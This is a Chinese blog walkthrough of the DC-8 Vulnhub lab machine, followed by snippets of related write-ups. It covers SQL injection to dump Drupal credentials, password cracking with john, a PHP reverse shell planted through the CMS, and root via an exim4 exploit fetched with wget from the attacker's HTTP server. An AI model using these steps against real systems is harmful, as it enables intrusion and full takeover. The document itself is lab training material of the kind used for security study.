DC-8靶机实战

最新推荐文章于 2025-01-16 12:00:36 发布
原创 最新推荐文章于 2025-01-16 12:00:36 发布 · 495 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全

DC-8靶机实战

nmap扫一下
主机发现
在这里插入图片描述
全扫描:
在这里插入图片描述
用drupal cms扫描器扫一下
在这里插入图片描述
7.67版本,卡得不上不下的,难搞喔
发现了存在php这个插件,如果能进到后台,执行一波php代码,反弹shell就好了

后面又是各种一顿扫,没有发现什么有用的,然后就去手动到网站找漏洞
后面遇到一个页面。以为有xml注入,结果尝试无果

最后找到了一个注入点
在这里插入图片描述
数字型注入,手工几下就拿到了users里面的admin 的口令和john 口令

john爆破了一下,admin的口令没有爆破出来,到是拿到john 口令

后台登录:
在这里插入图片描述
没有权限增加content,但能修改一个content
在这里插入图片描述
在这里插入图片描述
加入反弹shell代码,选择php code

然后到该页面填写提交,记得还是要填规范。不然报错也不会执行里面的反弹shell的
在这里插入图片描述
然后找提取的突破口
在这里插入图片描述
发现了exim4,看看版本
在这里插入图片描述
msf 精确搜索
在这里插入图片描述
选择本地权限提升的脚本
改成root.sh

看了一下内容,本地权限提升参数 -m netcat
kali打开http服务

下载到靶机
wget http://192.168.206.128:8000/root.sh
记得下载到可写目录

chmod +x root.sh
执行
在这里插入图片描述
出现了这个问题,脚本必须设置成unix

vim打开。set ff=unix
然后保存退出,再下载
执行

在这里插入图片描述

提权成功
在这里插入图片描述
读取flag

靶机DC-8(详细渗透,适合新手渗透)
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
渗透测试:DC-8靶机
Ciyaso的博客
08-23 729
一、扫描获取靶机ip arp-scan -l 192.168.203.147 二、获取网站信息 1.nmap 开放22、80端口 2.Wappaloyzer CMS:Drupal Web服务器:Apache 访问网站 3.sqlmap 点击Details下的选项发现url的nid=会发生变化, 在1后面加一个单引号,发现报错,说明存在sql注入 使用sqlmap sqlmap -u http://192.168.203.147/?nid=1 爆库 sqlmap -u http://192.
DC-8靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-08 6377
dc-8靶场详细渗透过程
靶机实战DC-8
CHAsichuan的博客
10-16 1653
一次较高难度的靶机实战分享和记录
DC8靶机
qq_40646572的博客
05-13 468
信息收集 开启dc8靶机 使用nmap扫描下当前网段。发现存在dc8靶机192.168.85.139主机。且主机开启了22端口以及80端口。 打开http服务。 web——getshell 经过测试,在home页面中,点击侧边栏,存在nid参数,经过测试该处存在sql注入点。 经过测试,当前数据表存在一个字段。 使用联合注入的方式获取到当前数据库名,d7db。 获取当前数据库的表个信息。看到当前数据库存在users数据表格。 Payload= nid=-1 union select gr
DC-8 靶机
日常打一些漏洞靶机
07-29 557
根据对比可知DC-8的一个ip地址为192.168.47.133。经过测试发现正确的账户名和密码为john和turtle。选择一个不需要root用户权限的目录,比如tmp。可得出一个叫turtle的密码。ps:如果出现下述情况可输入。出现robots.txt文件。发现存在用户登录的一个界面。选择使用46996.sh。出现root说明提权成功。发现一个比较奇怪的命令。
Vulnhub DC-9靶机实战
kiritio1024513的博客
01-13 1353
比较接近实战的一次靶机渗透,收获比较大,最后还给了一个比较好的工具
Vulnhub DC-8靶机攻击实战(一)
最新发布
初学者
01-16 1381
Vulnhub DC-8靶机教程来了,好久没有更新打靶的教程了,这次我们在来更新一期关于Vulnhub DC-8的打靶训练,如下所示。
vulnhub DC-4靶机实战
m0_51195235的博客
10-04 2456
vulnhub DC-4靶机实战
Vulnhub-DC-3靶机实战
御七彩虹猫
03-31 1261
Vulnhub-DC-3靶机实战
Vulnhub-DC-2靶机实战
御七彩虹猫
03-28 4037
Vulnhub-DC-2靶机实战
DC-8靶机
weixin_45778886的博客
03-26 3464
环境搭建
DC系列靶机-DC8
慕舟舟的博客
10-23 1217
作为一个邮件传输代理,Exim可以在不同的邮件服务器之间传递邮件,确保邮件能够正确地到达目的地。这里可以采用和dc5一样的做法;使用python搭建一个简易的服务器,将要下载的文件挂接过去;由于information_schema是MySQL的系统库,访问d7db这个数据库;根据这个版本,选择46996.sh的脚本文件来提权;用户名和密码,不过是加密的;这里存在一个上传并且解析php代码的地方;点击过程中,后面的id=1,会发生变化;这里最有可能出现的就是SQL注入;尝试搜索一下历史的漏洞;
vulnhub之DC8靶机
LainWith的博客
02-15 3158
目录介绍信息收集主机发现主机信息探测访问网站目录扫描漏洞发现手工SQL联合查询注入1. 判断列数,得知是1列2. 数据查询&信息收集(union select)3. 获取数据库的表名4. 查询指定表名下的列名信息5. 查询指定列获取数据6. 爆破密码反弹shell提权exim4提权拿到Flag 介绍 系列: DC(此系列共10台) 发布日期:2019年9月8日 难度:中级 Flag:此挑战的最终目标是绕过双因素身份验证,获取root权限并读取唯一的Flag 学习: sql注入 网站挂马 exim4
DC-8靶机(SQL注入,46996.sh提权)
m0_66299232的博客
11-19 634
用nmap探测靶机开放端口和对应服务情况 nmap -p- -A -T4 192.168.166.136。6.把密码写进hash.txt里用john工具破解出一个密码。1.用find命令查询以suid权限执行的文件。1.探测目标靶机ip arp-scan -l。5.开启http服务,将脚本下载到靶机8.写入php代码,反弹shell.虚拟机网络链接模式:桥接模式。2.发现一个exim4可利用。4.下载到当前目录下并查看。6.给执行权限,执行没成功。3.查询相关利用脚本。7.添加参数提权成功。
DC靶机系列:DC-8
Ays.Ie的博客
02-28 368
本篇文章为DC系列第8靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
渗透测试学习之靶机DC-8
情感博主V
03-16 587
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,获得目标主机IP:192.168.246.145 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.145 web站点相关服务信息 3. sql注入 在前面点击Details的几个链接,然后发现url里有个nid参数,尝试检测注入: 单引号报错:错误信息是多了个单引号 ...
DC: 8靶机-Walkthrough
ins1ght的博客
09-26 925
DC: 8靶机,不知道是不是这个系列的最后一个靶机,后面会把DC:1~6的Walkthrough都放出来,啥时候不确定,但一定有。靶机做了一些之后就发现“信息收集是王道,注意细节是魔鬼”,尤其这个靶机,真的是细节是魔鬼????。enjoy
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0XAXSDD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值